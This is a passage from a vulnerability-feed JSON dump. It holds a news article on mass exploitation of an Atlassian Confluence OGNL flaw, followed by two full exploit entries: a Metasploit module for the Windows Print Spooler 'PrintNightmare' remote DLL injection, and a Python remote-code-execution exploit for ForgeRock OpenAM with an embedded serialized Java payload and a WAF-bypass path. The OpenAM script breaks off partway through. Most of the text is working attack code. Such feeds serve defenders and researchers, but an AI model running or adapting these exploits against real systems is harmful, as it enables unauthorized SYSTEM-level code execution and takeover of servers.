{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2023-06-27T05:21:18", "id": "THN:B0B9A91EA9A6465B7D53D33D5B8173CB", "href": "https://thehackernews.com/2023/06/chinese-hackers-using-never-before-seen.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[![atlassian confluence](https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s728-e1000/Atlassian-Confluence.jpg)](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-25T15:25:18", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-25T00:00:00", "type": "packetstorm", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "PACKETSTORM:167261", "href": "https://packetstormsecurity.com/files/167261/Print-Spooler-Remote-DLL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'windows_error' \nrequire 'ruby_smb' \nrequire 'ruby_smb/error' \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \ninclude Msf::Exploit::Remote::SMB::Server::Share \ninclude Msf::Exploit::Retry \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Deprecated \n \nmoved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare' \n \nPrintSystem = RubySMB::Dcerpc::PrintSystem \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Print Spooler Remote DLL Injection', \n'Description' => %q{ \nThe print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted \nDCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN \nvector which requires the Print Spooler service to be running. \n}, \n'Author' => [ \n'Zhiniang Peng', # vulnerability discovery / research \n'Xuefeng Li', # vulnerability discovery / research \n'Zhipeng Huo', # vulnerability discovery \n'Piotr Madej', # vulnerability discovery \n'Zhang Yunhai', # vulnerability discovery \n'cube0x0', # PoC \n'Spencer McIntyre', # metasploit module \n'Christophe De La Fuente', # metasploit module co-author \n], \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'SRVHOST' => Rex::Socket.source_address \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Targets' => [ \n[ \n'Windows', { \n'Platform' => 'win', \n'Arch' => [ ARCH_X64, ARCH_X86 ] \n}, \n], \n], \n'DisclosureDate' => '2021-06-08', \n'References' => [ \n['CVE', '2021-1675'], \n['CVE', '2021-34527'], \n['URL', 'https://github.com/cube0x0/CVE-2021-1675'], \n['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'], \n['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'], \n['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'] \n], \n'Notes' => { \n'AKA' => [ 'PrintNightmare' ], \n'Stability' => [CRASH_SERVICE_DOWN], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [ \nARTIFACTS_ON_DISK # the dll will be copied to the remote server \n] \n} \n) \n) \n \nregister_advanced_options( \n[ \nOptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ]) \n] \n) \nderegister_options('AutoCheck') \nend \n \ndef check \nbegin \nconnect(backend: :ruby_smb) \nrescue Rex::ConnectionError \nreturn Exploit::CheckCode::Unknown('Failed to connect to the remote service.') \nend \n \nbegin \nsmb_login \nrescue Rex::Proto::SMB::Exceptions::LoginError \nreturn Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.') \nend \n \nbegin \ndcerpc_bind_spoolss \nrescue RubySMB::Error::UnexpectedStatusCode => e \nnt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nif nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND \nprint_error(\"The 'Print Spooler' service is disabled.\") \nend \nreturn Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\") \nend \n \n@target_arch = dcerpc_getarch \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43 \nif @target_arch == ARCH_X64 \n@environment = 'Windows x64' \nelsif @target_arch == ARCH_X86 \n@environment = 'Windows NT x86' \nelse \nreturn Exploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \nprint_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\") \n \nprint_status('Enumerating the installed printer drivers...') \ndrivers = enum_printer_drivers(@environment) \n@driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\" \nvprint_status(\"Using driver path: #{@driver_path}\") \n \nprint_status('Retrieving the path of the printer driver directory...') \n@config_directory = get_printer_driver_directory(@environment) \nvprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil? \n \ncontainer = driver_container( \np_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', \np_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\" \n) \n \ncase add_printer_driver_ex(container) \nwhen nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code \nreturn Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.') \nwhen ::WindowsError::Win32::ERROR_PATH_NOT_FOUND \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_BAD_NET_NAME \nreturn Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.') \nwhen ::WindowsError::Win32::ERROR_ACCESS_DENIED \nreturn Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.') \nend \n \nExploit::CheckCode::Detected('Successfully bound to the remote service.') \nend \n \ndef run \nfail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil? \nfail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil? \n \nsuper \nend \n \ndef setup \nif Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0 \nfail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') \nend \n \nsuper \nend \n \ndef start_service \nfile_name << '.dll' \nself.file_contents = generate_payload_dll \n \nsuper \nend \n \ndef primer \ndll_path = unc \nif dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/ \n# targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass \n# otherwise the operation will fail with ERROR_INVALID_PARAMETER \ndll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\" \nend \nvprint_status(\"Using DLL path: #{dll_path}\") \n \nfilename = dll_path.rpartition('\\\\').last \ncontainer = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path) \n \n3.times do \nadd_printer_driver_ex(container) \nend \n \n1.upto(3) do |directory| \ncontainer.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#{filename}\") \nbreak if add_printer_driver_ex(container).nil? \nend \n \ncleanup_service \nend \n \ndef driver_container(**kwargs) \nPrintSystem::DriverContainer.new( \nlevel: 2, \ntag: 2, \ndriver_info: PrintSystem::DriverInfo2.new( \nc_version: 3, \np_name_ref_id: 0x00020000, \np_environment_ref_id: 0x00020004, \np_driver_path_ref_id: 0x00020008, \np_data_file_ref_id: 0x0002000c, \np_config_file_ref_id: 0x00020010, \n# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 \np_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\", \np_environment: @environment, \np_driver_path: @driver_path, \n**kwargs \n) \n) \nend \n \ndef dcerpc_bind_spoolss \nhandle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss']) \nvprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nvprint_status(\"Bound to #{handle} ...\") \nend \n \ndef enum_printer_drivers(environment) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2) \nresponse = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length \nDriverInfo2.read(response.p_drivers.map(&:chr).join) \nend \n \ndef get_printer_driver_directory(environment) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2) \nresponse = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed) \nfail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length \nRubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT') \nend \n \ndef add_printer_driver_ex(container) \nflags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES \n \nbegin \nresponse = rprn_call('RpcAddPrinterDriverEx', p_name: \"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags) \nrescue RubySMB::Error::UnexpectedStatusCode => e \nnt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nmessage = \"Error #{nt_status.name} (#{nt_status.description})\" \nif nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN \n# STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected \nprint_status('The named pipe connection was broken, reconnecting...') \nreconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do \ndcerpc_bind_spoolss \nrescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e \nfalse \nelse \ntrue \nend \n \nunless reconnected \nvprint_status('Failed to reconnect to the named pipe.') \nreturn nil \nend \n \nprint_status('Successfully reconnected to the named pipe.') \nretry \nelse \nprint_error(message) \nend \n \nreturn nt_status \nend \n \nerror = ::WindowsError::Win32.find_by_retval(response.error_status.value).first \nmessage = \"RpcAddPrinterDriverEx response #{response.error_status}\" \nmessage << \" #{error.name} (#{error.description})\" unless error.nil? \nvprint_status(message) \nerror \nend \n \ndef rprn_call(name, **kwargs) \nrequest = PrintSystem.const_get(\"#{name}Request\").new(**kwargs) \n \nbegin \nraw_response = dcerpc.call(request.opnum, request.to_binary_s) \nrescue Rex::Proto::DCERPC::Exceptions::Fault => e \nfail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\") \nend \n \nPrintSystem.const_get(\"#{name}Response\").read(raw_response) \nend \n \nclass DriverInfo2Header < BinData::Record \nendian :little \n \nuint32 :c_version \nuint32 :name_offset \nuint32 :environment_offset \nuint32 :driver_path_offset \nuint32 :data_file_offset \nuint32 :config_file_offset \nend \n \n# this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2 \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030 \nDriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do \ndef self.read(data) \nheader = DriverInfo2Header.read(data) \nnew( \nheader, \nRubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT') \n) \nend \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167261/cve_2021_1675_printnightmare.rb.txt"}, {"lastseen": "2021-07-16T15:00:53", "description": "", "cvss3": {}, "published": "2021-07-16T00:00:00", "type": "packetstorm", "title": "ForgeRock Access Manager/OpenAM 14.6.3 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-16T00:00:00", "id": "PACKETSTORM:163525", "href": "https://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) \n# Date: 2021-07-14 \n# Exploit Author: Photubias \u2013 tijl[dot]deneut[at]Howest[dot]be for www.ic4.be \n# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244 \n# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/ \n# Version: [1] OpenAM 14.6.3 \n# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021 \n# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10 \n# CVE: CVE-2021-35464 \n \n#!/usr/bin/env python3 \n \n''' \nCopyright 2021 Photubias(c) \n \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-35464.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nRewritten from and full credits to @Y4er_ChaBug: \nhttps://github.com/Y4er/openam-CVE-2021-35464 \nand of course the discoverer @artsploit: \nhttps://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 \nCreated using https://github.com/frohoff/ysoserial \n''' \n \nimport urllib.request, urllib.parse, ssl, sys, optparse \n \n## Static vars; change at will, but recommend leaving as is \nsURL = 'http://192.168.0.100:7080/openam' \nsEndpoint = 'ccversion/Version' \nsEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs \niTimeout = 5 \nstrSerializedPayload = b'AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAABRfyv66vgAAADQBBgoARgCKCgCLAIwKAIsAjQoAHQCOCAB7CgAbAI8KAJAAkQoAkACSBwB8CgCLAJMIAJQKACAAlQgAlggAlwcAmAgAmQgAWQcAmgoAGwCbCACcCABxBwCdCwAWAJ4LABYAnwgAaAgAoAcAoQoAGwCiBwCjCgCkAKUIAKYHAKcIAKgKACAAqQgAqgkAJQCrBwCsCgAlAK0IAK4KAK8AsAoAIACxCACyCACzCAC0CAC1CAC2BwC3BwC4CgAwALkKADAAugoAuwC8CgAvAL0IAL4KAC8AvwoALwDACgAgAMEIAMIKABsAwwoAGwDECADFBwBlCgAbAMYIAMcHAMgIAMkIAMoHAMsKAEMAzAcAzQcAzgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDPAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAA2NscwEAEU \n \n## Ignore unsigned certs, if any because OpenAM is default HTTP \nssl._create_default_https_context = ssl._create_unverified_context \n \ndef checkParams(options, args): \nif args: sHost = args[0] \nelse: \nsHost = input('[?] Please enter the URL ['+sURL+'] : ') \nif sHost == '': sHost = sURL \nif not sHost[-1:] == '/': sHost += '/' \nif not sHost[:4].lower() == 'http': sHost = 'http://' + sHost \nif options.command: sCMD = options.command \nelse: sCMD = '' \nif options.proxy: sProxy = options.proxy \nelse: sProxy = '' \nreturn (sHost, sCMD, sProxy) \n \ndef findEndpoint(oOpener, sHost, sProxy): \ndef 